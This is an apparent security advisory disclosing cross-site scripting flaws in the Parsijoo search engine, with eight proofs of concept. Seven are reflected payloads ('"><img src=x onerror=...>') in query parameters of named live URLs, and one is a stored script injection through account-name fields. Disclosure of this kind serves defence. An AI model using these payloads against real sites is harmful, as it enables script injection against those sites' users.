Parsijoo Search Engine suffers from a cross site scripting vulnerability.
0aff94920da9819f0b10ac4ae23aca660ccbdef403bc6bf45ae550e11c5f8769
================================================================================
Cross Site Scripting on Search Engine Parsijoo
================================================================================
# # Author: bl4ck_mohajem (mohajem.war@gmail.com)
# #home page : http://www.parsijoo.ir/
# Description:
Parsijoo as a Persian search engine attempts to search for Persian
resources within the network.
# PoC 1 :
# URL: http://parsijoo.ir/web
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://parsijoo.ir/web?q="><img src=x onerror='alert("Found By
bl4ck_mohajem ")'>
# PoC 2 :
# URL: http://image.parsijoo.ir/image
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://image.parsijoo.ir/image?q="><img src=x
onerror='alert("Found By bl4ck_mohajem ")'>
# PoC 3 :
# URL: http://video.parsijoo.ir/video
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://video.parsijoo.ir/video?q="><img src=x
onerror='alert("Found By bl4ck_mohajem ")'>
# PoC 4 :
# URL: http://ava.parsijoo.ir/ava
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://ava.parsijoo.ir/ava?q="><img src=x onerror='alert("Found
By bl4ck_mohajem ")'>
# PoC 5 :
# URL: http://parsijoo.ir/download
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://parsijoo.ir/download?q="><img src=x onerror='alert("Found
By bl4ck_mohajem ")'>
# PoC 6 :
# URL: http://parsijoo.ir/bazaar
# Vulnerable Parameter : q
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://parsijoo.ir/bazaar?q=><img src=x onerror='alert("Found By
bl4ck_mohajem ")'>
# PoC 7 :
# URL: http://parsijoo.ir/feedback
# Vulnerable Parameter : src
# Payload : "><img src=x onerror='alert("Found By bl4ck_mohajem ")'>
# ==> http://parsijoo.ir/feedback?src="><img src=x
onerror='alert("Found By bl4ck_mohajem ")'>
# PoC 8 :
A registered user can exploit this issue in combination with social engineering.
# URL : https://accounts.parsijoo.ir/account
# Vulnerable Parameter (POST) : form:name , form:lastname
# Payload : "><script>alert('Found By bl4ck_mohajem ')</script>
Now can see alert in first page.
########################################################
#tnx: Milad Hacking - arf1372 - shabgard - ehsan hosseini - The
Nonexistent - n1arash- B3HZ4D - AMo hassan
#
#######################################################